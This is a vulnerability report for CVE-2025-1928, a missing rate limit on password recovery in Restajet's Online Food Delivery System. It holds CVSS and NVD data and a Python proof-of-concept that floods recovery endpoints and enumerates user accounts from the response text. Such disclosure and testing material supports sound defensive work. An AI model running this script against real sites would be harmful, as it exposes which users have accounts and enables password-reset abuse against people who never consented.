Security Vulnerability Report
CVE-2025-1928 CVSS 9.1 CRITICAL

CVE-2025-1928

Published: 2025-12-19 13:16:03
Last Modified: 2026-03-26 08:16:20

Description

Improper Restriction of Excessive Authentication Attempts vulnerability in Restajet Information Technologies Inc. Online Food Delivery System allows Password Recovery Exploitation. This issue affects Online Food Delivery System: through 19122025. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:restajet:online_food_delivery_system:-:*:*:*:*:*:*:* - VULNERABLE
Restajet Online Food Delivery System through 2025-12-19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-1928 PoC - Restajet Online Food Delivery System
Password Recovery Exploitation
Note: This PoC is for educational and authorized testing purposes only.
"""
import requests
import time
import sys


class CVE2025_1928_PoC:
    """
    Probe one deployment for missing request throttling (CWE-307) on its
    password-recovery endpoint, and optionally for account enumeration
    through the recovery response text.

    Every finding is printed; ``check_rate_limit`` and ``enumerate_users``
    also return a value. All requests go through one ``requests.Session``.
    """

    def __init__(self, target_url: str, target_email: str | None = None) -> None:
        """
        Args:
            target_url: Base URL of the deployment. A trailing slash is
                stripped so endpoint paths can be appended directly.
            target_email: Address submitted on every request. When omitted,
                ``check_rate_limit`` uses a distinct ``test<i>@example.com``
                per request instead.
        """
        self.target_url = target_url.rstrip('/')
        self.target_email = target_email
        # One session for the whole run, so server-set cookies persist
        # across requests.
        self.session = requests.Session()
        # Recovery requests that completed without a transport error.
        self.attempt_count = 0

    def check_rate_limit(self) -> bool:
        """
        Send ten recovery requests to each candidate endpoint and report
        whether any response looks like throttling.

        Returns:
            True as soon as one response carries HTTP 429 or contains
            "too many requests" (the remaining endpoints are not tried);
            False once every endpoint has been exercised without either.
        """
        # Candidate paths only. Nothing checks that a path exists, so a 404
        # is counted exactly like any other non-429 answer.
        endpoints = [
            '/forgot-password',
            '/password-reset',
            '/account/recover',
            '/user/forgot-password',
            '/api/password/forgot'
        ]
        print(f"[*] Testing password recovery endpoints for rate limiting...")
        for endpoint in endpoints:
            url = f"{self.target_url}{endpoint}"
            print(f"\n[*] Testing: {url}")
            for i in range(10):
                try:
                    # Fixed browser-like User-Agent on every request.
                    headers = {
                        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
                    }
                    # Without a target_email each request carries a different
                    # address, so the payload is not identical across attempts.
                    data = {'email': self.target_email or f'test{i}@example.com'}
                    response = self.session.post(url, data=data, headers=headers, timeout=10)
                    self.attempt_count += 1
                    print(f" Request {i+1}: Status={response.status_code}, "
                          f"Response time={response.elapsed.total_seconds():.3f}s")
                    # Check for rate limit response. The first throttling
                    # signal wins; no further endpoints are tested after it.
                    if response.status_code == 429:
                        print(f"[+] Rate limiting detected on {endpoint}")
                        return True
                    elif 'too many requests' in response.text.lower():
                        print(f"[+] Rate limit message found on {endpoint}")
                        return True
                    # NOTE(review): 10 requests at 0.5 s spacing is a small
                    # sample; a limiter with a higher threshold or a longer
                    # window would not fire here - confirm against the
                    # expected policy before drawing a conclusion.
                    time.sleep(0.5)
                except requests.exceptions.RequestException as e:
                    # Transport errors (timeouts, connection failures) are
                    # printed and the attempt is not counted.
                    print(f" Error: {e}")
                    continue
        # NOTE(review): reached only when no response carried 429 or
        # "too many requests". Because 404s are not filtered out above, this
        # verdict is meaningful only for the path that actually serves
        # password recovery.
        print("\n[!] WARNING: No rate limiting detected on password recovery endpoints!")
        print(f"[!] Made {self.attempt_count} requests without any blocking.")
        return False

    def enumerate_users(self, email_list: list[str]) -> dict[str, str]:
        """
        Submit each address to ``/forgot-password`` and classify the reply
        text.

        Args:
            email_list: Addresses to submit, one request each.

        Returns:
            Mapping of address to 'NOT_EXISTS', 'EXISTS' or 'UNKNOWN'.
            Addresses whose request raised are absent from the result.
        """
        print(f"\n[*] Testing for user enumeration vulnerability...")
        # Hard-coded to the first candidate path, independent of what
        # check_rate_limit observed.
        endpoint = f"{self.target_url}/forgot-password"
        results = {}
        for email in email_list:
            try:
                response = self.session.post(endpoint, data={'email': email}, timeout=10)
                # Analyze response for user enumeration. Classification is
                # by substring match on the lower-cased body only.
                if 'not found' in response.text.lower() or 'does not exist' in response.text.lower():
                    results[email] = 'NOT_EXISTS'
                    print(f" [-] {email}: User does not exist")
                # NOTE(review): 'email' matches almost any recovery page
                # (likely the form label itself), so 'EXISTS' is a weak
                # signal and probably over-reported - confirm by hand before
                # treating it as a finding.
                elif 'sent' in response.text.lower() or 'email' in response.text.lower():
                    results[email] = 'EXISTS'
                    print(f" [+] {email}: User EXISTS - vulnerable to enumeration!")
                else:
                    results[email] = 'UNKNOWN'
                    print(f" [?] {email}: Unknown response")
            except Exception as e:
                # Broad catch: any failure, not only transport errors, is
                # printed and the address is skipped.
                print(f" [!] Error testing {email}: {e}")
        return results

    def run_exploit(self) -> None:
        """
        Print a banner, run the rate-limit probe, optionally run the
        enumeration probe for ``target_email``, and print a summary with
        the remediation advice.

        The "VULNERABLE" verdict is printed whenever ``check_rate_limit``
        returns False. Nothing is returned.
        """
        print("=" * 60)
        print("CVE-2025-1928 PoC - Restajet Online Food Delivery System")
        print("Improper Restriction of Excessive Authentication Attempts")
        print("=" * 60)
        print(f"[*] Target: {self.target_url}")
        print(f"[*] Starting vulnerability assessment...\n")
        # Check for rate limiting vulnerability.
        rate_limit_exists = self.check_rate_limit()
        # NOTE(review): the verdict rests solely on the absence of a 429 /
        # "too many requests" reply; throttling expressed any other way
        # (redirect, challenge page, silent drop) would be reported as a
        # vulnerability here.
        if not rate_limit_exists:
            print("\n[!] VULNERABLE: No rate limiting detected!")
            print("[*] This confirms CVE-2025-1928 vulnerability")
        # Test user enumeration only when an address was supplied.
        if self.target_email:
            self.enumerate_users([self.target_email])
        print("\n[*] Assessment complete.")
        print("[*] Recommendation: Implement rate limiting and account lockout mechanisms")


if __name__ == "__main__":
    # CLI: positional base URL, optional address as the second argument.
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-1928.py <target_url> [email]")
        print("Example: python cve-2025-1928.py http://target.com [email protected]")
        sys.exit(1)
    target = sys.argv[1]
    email = sys.argv[2] if len(sys.argv) > 2 else None
    poc = CVE2025_1928_PoC(target, email)
    poc.run_exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-1928", "sourceIdentifier": "[email protected]", "published": "2025-12-19T13:16:03.313", "lastModified": "2026-03-26T08:16:19.620", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Restriction of Excessive Authentication Attempts vulnerability in Restajet Information Technologies Inc. Online Food Delivery System allows Password Recovery Exploitation.This issue affects Online Food Delivery System: through 19122025. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Vulnerabilidad de restricción inadecuada de intentos de autenticación excesivos en el sistema de entrega de comida en línea de Restajet Information Technologies Inc. permite la explotación de recuperación de contraseña. Este problema afecta al sistema de entrega de comida en línea: hasta el 19122025. NOTA: Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:restajet:online_food_delivery_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "D9645287-A3CA-4036-B2DB-513F54F58AE6"}]}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0469", "source": "[email protected]", "tags": ["Third 
Party Advisory"]}]}}